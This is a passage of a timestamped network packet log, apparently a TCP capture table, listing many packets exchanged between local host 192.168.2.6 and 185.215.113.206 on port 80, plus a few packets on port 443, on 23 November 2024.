Nov 23, 2024 07:09:20.375758886 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.375828028 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.375878096 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.376741886 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.376879930 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.376935005 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.377784967 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.377837896 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.377902031 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.377954960 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.378839970 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.378926039 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.378956079 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.379015923 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.379853010 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.379906893 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.379978895 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.380028963 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.380924940 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.380984068 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.381005049 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.381056070 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.381951094 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.382019043 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.432476997 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.432571888 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.432579041 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.432629108 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.432918072 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.432977915 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.433149099 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.433166027 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.433202028 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.433233976 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.434149027 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.434247971 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.434305906 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.435184002 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.435211897 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.435276031 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.436222076 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.436279058 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.436331034 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.436419010 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.437248945 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.437314034 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.437347889 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.437393904 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.438324928 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.438443899 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.438491106 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.439342976 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.439435959 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.439465046 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.439487934 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.440376997 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.440431118 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.440465927 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.440550089 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.441431999 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.441529989 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.441536903 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.441581011 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.442475080 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.442523956 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.442565918 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.442611933 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.443521976 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.443593979 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.443619967 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.443679094 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.444602013 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.444641113 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.444669008 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.444698095 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.445583105 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.445635080 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.445674896 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.445739985 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.446623087 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.446676016 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.446701050 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.446749926 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.447654009 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.447782040 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.447809935 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.447834969 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.448694944 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.448755980 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.448800087 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.448854923 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.449731112 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.449832916 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.449858904 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.449904919 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.450799942 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.450854063 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.450887918 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.450942039 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.451813936 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.451870918 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.451905012 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.451972008 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.452851057 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.452908039 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.452929974 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.452975035 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.453882933 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.453937054 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.453977108 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.454022884 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.455197096 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.455224991 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.455280066 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.455909967 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.456054926 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.499697924 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.499727011 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.499762058 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.499793053 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.500217915 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.500305891 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.500332117 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.500402927 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.501250982 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.501302004 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.501338005 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.501383066 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.502286911 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.502343893 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.502396107 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.502444029 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.503371954 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.503515005 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.503582954 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.504391909 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.504446030 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.504481077 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.504548073 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.505412102 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.505466938 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.505507946 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.505578995 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.506443024 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.506496906 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.506531000 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.506589890 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.507503033 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.507565975 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.507608891 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.507656097 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.508528948 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.508591890 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.508626938 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.508672953 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.509568930 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.509650946 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.509670973 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.509716034 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.510632992 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.510684967 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.510724068 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.510773897 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.511668921 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.511773109 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.511781931 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.511822939 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.512660027 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.512762070 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.557868958 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.557929993 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.558119059 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.558183908 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.558394909 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.558449984 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.558624983 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.558712006 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.559434891 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.559490919 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.559530973 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.559581995 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.560463905 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.560524940 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.560611963 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.560656071 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.561513901 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.561585903 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.561593056 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.561631918 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.562547922 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.562606096 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.562670946 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.563589096 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.563663006 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.563694000 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.563740969 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.564635992 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.564722061 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.564732075 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.564793110 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.565910101 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.565973997 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.566009045 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.566104889 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.566709042 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.566761971 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.566838980 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.566890955 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.567749023 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.567778111 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.567827940 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.567872047 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.568799973 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.568871975 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.568908930 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.569022894 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.569838047 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.569911003 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.569916010 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.569960117 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.570837975 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.570897102 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.570924997 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.571182966 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.571902037 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.571984053 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.571995974 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.572053909 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.572926998 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.572982073 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.573105097 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.573194027 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.573973894 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.574023008 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.574059010 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.574083090 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.601680994 CET	443	49706	173.222.162.64	192.168.2.6
Nov 23, 2024 07:09:20.601813078 CET	49706	443	192.168.2.6	173.222.162.64
Nov 23, 2024 07:09:20.624675989 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.624743938 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.624747992 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.624793053 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.625248909 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.625305891 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.625354052 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.625410080 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.626214027 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.626266956 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.626308918 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.626519918 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.627274036 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.627332926 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.627361059 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.627435923 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.628287077 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.628355026 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.628388882 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.628494024 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.629328012 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.629429102 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.629429102 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.629472017 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.630379915 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.630494118 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.630537987 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.630567074 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.631381035 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.631433964 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.631525993 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.631583929 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.632438898 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.632524014 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.632560015 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.632648945 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.633479118 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.633531094 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.633567095 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.633610010 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.634543896 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.634603024 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.634691000 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.634742975 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.635570049 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.635623932 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.635663033 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.635894060 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.636607885 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.636662006 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.636697054 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.636758089 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.637691975 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.637710094 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.637759924 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.637784958 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.638685942 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.638756037 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.638793945 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.638848066 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.639703989 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.639760971 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.639810085 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.639864922 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.640748978 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.640800953 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.640844107 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.640889883 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.641786098 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.641835928 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.641864061 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.641979933 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.642838001 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.642890930 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.642930984 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.642980099 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.643906116 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.643959999 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.643975019 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.644026041 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.644898891 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.645014048 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.645066977 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.645950079 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.646035910 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.646051884 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.646106005 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.647001982 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.647069931 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.647121906 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.647173882 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.647998095 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.648056030 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.691704988 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.691765070 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.691798925 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.691864014 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.692169905 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.692224026 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.692414045 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.692468882 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.692509890 CET	80	49717	185.215.113.206	192.168.2.6
